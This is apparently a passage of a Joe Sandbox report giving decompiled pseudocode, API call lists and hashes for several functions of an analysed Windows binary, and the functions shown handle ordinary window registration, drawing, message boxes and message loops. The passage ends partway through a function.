                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-3916222277
                                  • Opcode ID: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction ID: 817a9b8dd40d9bc959f5a232768311c680acfa878775ab5ad3296b6e14a350e3
                                  • Opcode Fuzzy Hash: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction Fuzzy Hash: 795121759002199BCB21DB9ACC90BD9B3BCAF08304F4045EAF509F7282D6749F948F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0042F55C(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                  				char _v68;
                                  				struct _WNDCLASSA _v108;
                                  				intOrPtr _v116;
                                  				signed char _v137;
                                  				void* _v144;
                                  				struct _WNDCLASSA _v184;
                                  				char _v188;
                                  				char _v192;
                                  				char _v196;
                                  				int _t52;
                                  				void* _t53;
                                  				intOrPtr _t86;
                                  				intOrPtr _t104;
                                  				intOrPtr _t108;
                                  				void* _t109;
                                  				intOrPtr* _t111;
                                  				void* _t115;
                                  
                                  				_t109 = __edi;
                                  				_t94 = __ebx;
                                  				_push(__ebx);
                                  				_v196 = 0;
                                  				_t111 = __eax;
                                  				_push(_t115);
                                  				_push(0x42f71d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t115 + 0xffffff40;
                                  				_t95 =  *__eax;
                                  				 *((intOrPtr*)( *__eax + 0x98))();
                                  				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                  					L7:
                                  					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
                                  					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                  					asm("sbb eax, eax");
                                  					_t53 = _t52 + 1;
                                  					if(_t53 == 0 || E00428CE4 != _v184.lpfnWndProc) {
                                  						if(_t53 != 0) {
                                  							UnregisterClassA( &_v68, _v108.hInstance);
                                  						}
                                  						_v108.lpfnWndProc = E00428CE4;
                                  						_v108.lpszClassName =  &_v68;
                                  						if(RegisterClassA( &_v108) == 0) {
                                  							E0040C3F4(_t94, _t95, _t109, _t111);
                                  						}
                                  					}
                                  					 *0x44d9d4 = _t111;
                                  					_t96 =  *_t111;
                                  					 *((intOrPtr*)( *_t111 + 0x9c))();
                                  					if( *(_t111 + 0x180) == 0) {
                                  						E0040C3F4(_t94, _t96, _t109, _t111);
                                  					}
                                  					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
                                  						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
                                  					}
                                  					E00408360( *((intOrPtr*)(_t111 + 0x64)));
                                  					 *((intOrPtr*)(_t111 + 0x64)) = 0;
                                  					E00432810(_t111);
                                  					E0042D05C(_t111, E0041BF14( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
                                  					_t130 =  *((char*)(_t111 + 0x5c));
                                  					if( *((char*)(_t111 + 0x5c)) != 0) {
                                  						E004032D4(_t111, _t130);
                                  					}
                                  					_pop(_t104);
                                  					 *[fs:eax] = _t104;
                                  					_push(0x42f724);
                                  					return E00403E10( &_v196);
                                  				} else {
                                  					_t94 =  *((intOrPtr*)(__eax + 4));
                                  					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
                                  						L6:
                                  						_v192 =  *((intOrPtr*)(_t111 + 8));
                                  						_v188 = 0xb;
                                  						_t86 =  *0x44dff0; // 0x41a2a0
                                  						E00405910(_t86,  &_v196);
                                  						_t95 = _v196;
                                  						E0040B0AC(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
                                  						E0040384C();
                                  					} else {
                                  						_t108 =  *0x42840c; // 0x428458
                                  						if(E00403264(_t94, _t108) == 0) {
                                  							goto L6;
                                  						}
                                  						_v116 = E004325A4(_t94);
                                  					}
                                  					goto L7;
                                  				}
                                  			}





















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                  • String ID: @
                                  • API String ID: 717780171-2766056989
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetActiveWindow.USER32 ref: 0044B30B
                                  • GetWindowRect.USER32 ref: 0044B365
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0044B39D
                                  • MessageBoxA.USER32 ref: 0044B3DE
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0044B454,?,00000000,0044B44D), ref: 0044B42E
                                  • SetActiveWindow.USER32(?,0044B454,?,00000000,0044B44D), ref: 0044B43F
                                  Strings
                                  Similarity
                                  • API ID: Window$Active$MessageRect
                                  • String ID: (
                                  • API String ID: 3147912190-3887548279
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00421E68(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				struct HMONITOR__* _t27;
                                  				struct tagMONITORINFO* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x44f924 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						_t29->rcMonitor.left = 0;
                                  						_t29->rcMonitor.top = 0;
                                  						_t29->rcMonitor.right = GetSystemMetrics(0);
                                  						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00405F88();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					 *0x44f908 = E00421B38(4, _t23,  *0x44f908, _t27, _t29);
                                  					_t24 = GetMonitorInfoA(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}














                                  APIs
                                  • GetMonitorInfoA.USER32(?,?), ref: 00421E99
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00421EC0
                                  • GetSystemMetrics.USER32 ref: 00421ED5
                                  • GetSystemMetrics.USER32 ref: 00421EE0
                                  • lstrcpy.KERNEL32(?,DISPLAY), ref: 00421F0A
                                    • Part of subcall function 00421B38: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00421BB8
                                  Strings
                                  Similarity
                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfo
                                  • API String ID: 1539801207-1633989206
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00403C94(void* __ecx) {
                                  				long _v4;
                                  				int _t3;
                                  
                                  				if( *0x44f048 == 0) {
                                  					if( *0x44d030 == 0) {
                                  						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                  					}
                                  					return _t3;
                                  				} else {
                                  					if( *0x44f21c == 0xd7b2 &&  *0x44f224 > 0) {
                                  						 *0x44f234();
                                  					}
                                  					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                  					return WriteFile(GetStdHandle(0xfffffff5), E00403D1C, 2,  &_v4, 0);
                                  				}
                                  			}






                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62,?,?,?,00000001,00403E02,004027CB,00402813,?,00000000), ref: 00403CCD
                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62,?,?,?,00000001,00403E02,004027CB,00402813), ref: 00403CD3
                                  • GetStdHandle.KERNEL32(000000F5,00403D1C,00000002,0044C944,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62), ref: 00403CE8
                                  • WriteFile.KERNEL32(00000000,000000F5,00403D1C,00000002,0044C944,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0044C944,00000000,?,00403D62), ref: 00403CEE
                                  • MessageBoxA.USER32 ref: 00403D0C
                                  Strings
                                  Similarity
                                  • API ID: FileHandleWrite$Message
                                  • String ID: Error$Runtime error at 00000000
                                  • API String ID: 1570097196-2970929446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 39%
                                  			E00438D54(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v28;
                                  				char _v44;
                                  				void* __edi;
                                  				void* __ebp;
                                  				void* _t46;
                                  				void* _t57;
                                  				intOrPtr _t85;
                                  				intOrPtr _t96;
                                  				void* _t117;
                                  				void* _t118;
                                  				void* _t127;
                                  				struct HDC__* _t136;
                                  				struct HDC__* _t137;
                                  				intOrPtr* _t138;
                                  				void* _t139;
                                  
                                  				_t119 = __ecx;
                                  				_t135 = __ecx;
                                  				_v8 = __edx;
                                  				_t118 = __eax;
                                  				_t46 = E004388F4(__eax);
                                  				if(_t46 != 0) {
                                  					_t142 = _a4;
                                  					if(_a4 == 0) {
                                  						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                  						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                  							_t138 = E0041F450(1);
                                  							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                  							E00420788(_t138, 1);
                                  							 *((intOrPtr*)( *_t138 + 0x40))();
                                  							_t119 =  *_t138;
                                  							 *((intOrPtr*)( *_t138 + 0x34))();
                                  						}
                                  						E0041C6CC( *((intOrPtr*)(E0041FA18( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                  						E004120F0(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( &_v44);
                                  						_t57 = E0041FA18( *((intOrPtr*)(_t118 + 0x54)));
                                  						_pop(_t127);
                                  						E0041CA70(_t57, _t127);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0xffffffff);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(E0041CD58(E0041FA18( *((intOrPtr*)(_t118 + 0x54)))));
                                  						_push(_v8);
                                  						_push(E00438A30(_t118));
                                  						L00421A90();
                                  						E004120F0(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                  						_v12 = E0041CD58(E0041FA18( *((intOrPtr*)(_t118 + 0x54))));
                                  						E0041C6CC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
                                  						_t136 = E0041CD58(_t135);
                                  						SetTextColor(_t136, 0xffffff);
                                  						SetBkColor(_t136, 0);
                                  						_push(0xe20746);
                                  						_push(0);
                                  						_push(0);
                                  						_push(_v12);
                                  						_push( *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( *((intOrPtr*)(_t118 + 0x34)));
                                  						_push(_a12 + 1);
                                  						_t85 = _a16 + 1;
                                  						__eflags = _t85;
                                  						_push(_t85);
                                  						_push(_t136);
                                  						L00405FA8();
                                  						E0041C6CC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
                                  						_t137 = E0041CD58(_t135);
                                  						SetTextColor(_t137, 0xffffff);
                                  						SetBkColor(_t137, 0);
                                  						_push(0xe20746);
                                  						_push(0);
                                  						_push(0);
                                  						_push(_v12);
                                  						_push( *((intOrPtr*)(_t118 + 0x30)));
                                  						_push( *((intOrPtr*)(_t118 + 0x34)));
                                  						_push(_a12);
                                  						_t96 = _a16;
                                  						_push(_t96);
                                  						_push(_t137);
                                  						L00405FA8();
                                  						return _t96;
                                  					}
                                  					_push(_a8);
                                  					_push(E00438744(_t142));
                                  					E00438D2C(_t118, _t142);
                                  					_push(E00438744(_t142));
                                  					_push(0);
                                  					_push(0);
                                  					_push(_a12);
                                  					_push(_a16);
                                  					_push(E0041CD58(__ecx));
                                  					_push(_v8);
                                  					_t117 = E00438A30(_t118);
                                  					_push(_t117);
                                  					L00421A90();
                                  					return _t117;
                                  				}
                                  				return _t46;
                                  			}





















                                  APIs
                                  • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00438DB3
                                  • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00438E54
                                  • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00438EA1
                                  • SetBkColor.GDI32(00000000,00000000), ref: 00438EA9
                                  • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00438ECE
                                    • Part of subcall function 00438D2C: 73452240.COMCTL32(00000000,?,00438D8D,00000000,?), ref: 00438D42
                                  Similarity
                                  • API ID: 73452430Color$73452240E897Text
                                  • String ID:
                                  • API String ID: 3108427945-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00447DA8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				short _v22;
                                  				intOrPtr _v28;
                                  				struct HWND__* _v32;
                                  				char _v36;
                                  				intOrPtr _t50;
                                  				intOrPtr _t56;
                                  				intOrPtr _t60;
                                  				intOrPtr _t61;
                                  				intOrPtr _t62;
                                  				intOrPtr _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t68;
                                  				intOrPtr _t70;
                                  				intOrPtr _t80;
                                  				intOrPtr _t82;
                                  				intOrPtr _t85;
                                  				void* _t90;
                                  				intOrPtr _t122;
                                  				void* _t124;
                                  				void* _t127;
                                  				void* _t128;
                                  				intOrPtr _t129;
                                  
                                  				_t125 = __esi;
                                  				_t124 = __edi;
                                  				_t105 = __ebx;
                                  				_t127 = _t128;
                                  				_t129 = _t128 + 0xffffffe0;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_v36 = 0;
                                  				_v8 = __eax;
                                  				_push(_t127);
                                  				_push(0x448070);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t129;
                                  				E0042A750();
                                  				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                  					_t50 =  *0x44df00; // 0x41a2b8
                                  					E00405910(_t50,  &_v36);
                                  					E0040B070(_v36, 1);
                                  					E0040384C();
                                  				}
                                  				if(GetCapture() != 0) {
                                  					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                  				}
                                  				ReleaseCapture();
                                  				_t56 =  *0x44fbb0; // 0x2191714
                                  				E0044A248(_t56);
                                  				_push(_t127);
                                  				_push(0x448053);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                                  				_v32 = GetActiveWindow();
                                  				_t60 =  *0x44dc24; // 0x0
                                  				_v20 = _t60;
                                  				_t61 =  *0x44fbb4; // 0x2191320
                                  				_t62 =  *0x44fbb4; // 0x2191320
                                  				E004135A0( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
                                  				_t65 =  *0x44fbb4; // 0x2191320
                                  				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
                                  				_t66 =  *0x44fbb4; // 0x2191320
                                  				_v22 =  *((intOrPtr*)(_t66 + 0x44));
                                  				_t68 =  *0x44fbb4; // 0x2191320
                                  				E00449278(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
                                  				_t70 =  *0x44fbb4; // 0x2191320
                                  				_v28 =  *((intOrPtr*)(_t70 + 0x48));
                                  				_v16 = E00442180(0, _t105, _t124, _t125);
                                  				_push(_t127);
                                  				_push(0x448031);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				E00447CF8(_v8);
                                  				_push(_t127);
                                  				_push(0x447f90);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t129;
                                  				SendMessageA(E004325A4(_v8), 0xb000, 0, 0);
                                  				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                  				do {
                                  					_t80 =  *0x44fbb0; // 0x2191714
                                  					E0044B054(_t80, _t124, _t125);
                                  					_t82 =  *0x44fbb0; // 0x2191714
                                  					if( *((char*)(_t82 + 0x9c)) == 0) {
                                  						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                  							E00447C58(_v8);
                                  						}
                                  					} else {
                                  						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                  					}
                                  					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
                                  				} while (_t85 == 0);
                                  				_v12 = _t85;
                                  				SendMessageA(E004325A4(_v8), 0xb001, 0, 0);
                                  				_t90 = E004325A4(_v8);
                                  				if(_t90 != GetActiveWindow()) {
                                  					_v32 = 0;
                                  				}
                                  				_pop(_t122);
                                  				 *[fs:eax] = _t122;
                                  				_push(0x447f97);
                                  				return E00447CF0();
                                  			}

                                  APIs
                                  • GetCapture.USER32 ref: 00447E19
                                  • GetCapture.USER32 ref: 00447E28
                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00447E2E
                                  • ReleaseCapture.USER32(00000000,00448070), ref: 00447E33
                                  • GetActiveWindow.USER32 ref: 00447E5A
                                  • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00447EF0
                                  • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00447F5D
                                  • GetActiveWindow.USER32 ref: 00447F6C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CaptureMessageSend$ActiveWindow$Release
                                  • String ID:
                                  • API String ID: 862346643-0
                                  • Opcode ID: 69d29f9294f3bb6aa13494bcb80e43d70164ab4c77b805e4b36a31d6237639db
                                  • Instruction ID: 53852f02c106b836b00ca19f430d6591e641216b35f656d96903cccaad350bbd
                                  • Opcode Fuzzy Hash: 69d29f9294f3bb6aa13494bcb80e43d70164ab4c77b805e4b36a31d6237639db
                                  • Instruction Fuzzy Hash: 36513C34A10244EFE710EF69C996B5E77F1EF4A704F1140B9F504A76A1D778AE05CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004305E0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                  				int _v8;
                                  				int _v12;
                                  				int _v16;
                                  				char _v20;
                                  				struct tagRECT _v36;
                                  				signed int _t54;
                                  				intOrPtr _t59;
                                  				int _t61;
                                  				void* _t63;
                                  				void* _t66;
                                  				void* _t82;
                                  				int _t98;
                                  				struct HDC__* _t99;
                                  
                                  				_t99 = __edx;
                                  				_t82 = __eax;
                                  				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                  				_v16 = SaveDC(__edx);
                                  				E0042A82C(__edx, _a4, __ecx);
                                  				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                  				_t98 = 0;
                                  				_v12 = 0;
                                  				if((GetWindowLongA(E004325A4(_t82), 0xffffffec) & 0x00000002) == 0) {
                                  					_t54 = GetWindowLongA(E004325A4(_t82), 0xfffffff0);
                                  					__eflags = _t54 & 0x00800000;
                                  					if((_t54 & 0x00800000) != 0) {
                                  						_v12 = 3;
                                  						_t98 = 0xa00f;
                                  					}
                                  				} else {
                                  					_v12 = 0xa;
                                  					_t98 = 0x200f;
                                  				}
                                  				if(_t98 != 0) {
                                  					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                  					DrawEdge(_t99,  &_v36, _v12, _t98);
                                  					E0042A82C(_t99, _v36.top, _v36.left);
                                  					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                  				}
                                  				E0042D05C(_t82, _t99, 0x14, 0);
                                  				E0042D05C(_t82, _t99, 0xf, 0);
                                  				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                  				if(_t59 == 0) {
                                  					L12:
                                  					_t61 = RestoreDC(_t99, _v16);
                                  					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                  					return _t61;
                                  				} else {
                                  					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                  					if(_t63 < 0) {
                                  						goto L12;
                                  					}
                                  					_v20 = _t63 + 1;
                                  					_v8 = 0;
                                  					do {
                                  						_t66 = E00413524( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                  						_t107 =  *((char*)(_t66 + 0x57));
                                  						if( *((char*)(_t66 + 0x57)) != 0) {
                                  							E004305E0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                  						}
                                  						_v8 = _v8 + 1;
                                  						_t36 =  &_v20;
                                  						 *_t36 = _v20 - 1;
                                  					} while ( *_t36 != 0);
                                  					goto L12;
                                  				}
                                  			}

                                  APIs
                                  • SaveDC.GDI32 ref: 004305F6
                                    • Part of subcall function 0042A82C: GetWindowOrgEx.GDI32(?), ref: 0042A83A
                                    • Part of subcall function 0042A82C: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0042A850
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00430617
                                  • GetWindowLongA.USER32 ref: 0043062D
                                  • GetWindowLongA.USER32 ref: 0043064F
                                  • SetRect.USER32 ref: 0043067B
                                  • DrawEdge.USER32(?,?,?,00000000), ref: 0043068A
                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 004306AF
                                  • RestoreDC.GDI32(?,?), ref: 00430720
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                  • String ID:
                                  • API String ID: 2976466617-0
                                  • Opcode ID: ef9575348ec2406790e3cac31896200a622501cb9a75c05b3c6e147418799f12
                                  • Instruction ID: c13df65c76a784b37967d26beec2acafc9f571f3b084919c196f5d570f9368b5
                                  • Opcode Fuzzy Hash: ef9575348ec2406790e3cac31896200a622501cb9a75c05b3c6e147418799f12
                                  • Instruction Fuzzy Hash: 5D416471B00114ABDB14EAA9CC91FAF77A8AF48314F10416AFA05EB386DB7DDD118798
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 26%
                                  			E0041D684(void* __ebx) {
                                  				intOrPtr _v8;
                                  				char _v1000;
                                  				char _v1004;
                                  				char _v1032;
                                  				signed int _v1034;
                                  				short _v1036;
                                  				void* _t24;
                                  				intOrPtr _t25;
                                  				intOrPtr _t27;
                                  				intOrPtr _t29;
                                  				intOrPtr _t45;
                                  				intOrPtr _t52;
                                  				void* _t54;
                                  				void* _t55;
                                  
                                  				_t54 = _t55;
                                  				_v1036 = 0x300;
                                  				_v1034 = 0x10;
                                  				_t25 = E004028B8(_t24, 0x40,  &_v1032);
                                  				_push(0);
                                  				L004062C0();
                                  				_v8 = _t25;
                                  				_push(_t54);
                                  				_push(0x41d781);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t55 + 0xfffffbf8;
                                  				_push(0x68);
                                  				_t27 = _v8;
                                  				_push(_t27);
                                  				L00406058();
                                  				_t45 = _t27;
                                  				if(_t45 >= 0x10) {
                                  					_push( &_v1032);
                                  					_push(8);
                                  					_push(0);
                                  					_push(_v8);
                                  					L00406080();
                                  					if(_v1004 != 0xc0c0c0) {
                                  						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                  						_push(8);
                                  						_push(_t45 - 8);
                                  						_push(_v8);
                                  						L00406080();
                                  					} else {
                                  						_push( &_v1004);
                                  						_push(1);
                                  						_push(_t45 - 8);
                                  						_push(_v8);
                                  						L00406080();
                                  						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                  						_push(7);
                                  						_push(_t45 - 7);
                                  						_push(_v8);
                                  						L00406080();
                                  						_push( &_v1000);
                                  						_push(1);
                                  						_push(7);
                                  						_push(_v8);
                                  						L00406080();
                                  					}
                                  				}
                                  				_pop(_t52);
                                  				 *[fs:eax] = _t52;
                                  				_push(E0041D788);
                                  				_t29 = _v8;
                                  				_push(_t29);
                                  				_push(0);
                                  				L004064F8();
                                  				return _t29;
                                  			}

                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 0041D6B2
                                  • 72E7AD70.GDI32(?,00000068,00000000,0041D781,?,00000000), ref: 0041D6CE
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041D781,?,00000000), ref: 0041D6ED
                                  • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041D781,?,00000000), ref: 0041D711
                                  • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0041D781), ref: 0041D72F
                                  • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0041D743
                                  • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041D781,?,00000000), ref: 0041D763
                                  • 72E7B380.USER32(00000000,?,0041D788,0041D781,?,00000000), ref: 0041D77B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: aa5f769936e66e02a718509b821573dc37915db1f5b611c73005b37768b1ff2d
                                  • Instruction ID: 137a3a726aca79937dae68fdff2244ab0ed3d4b961df9118b1154d5a56232b53
                                  • Opcode Fuzzy Hash: aa5f769936e66e02a718509b821573dc37915db1f5b611c73005b37768b1ff2d
                                  • Instruction Fuzzy Hash: 982186F1A40208AEDB10DBA5CD81F9E73ACEB08704F5104A6FB49F71C1D6799E548B28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0043B684(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				char _v12;
                                  				char _v13;
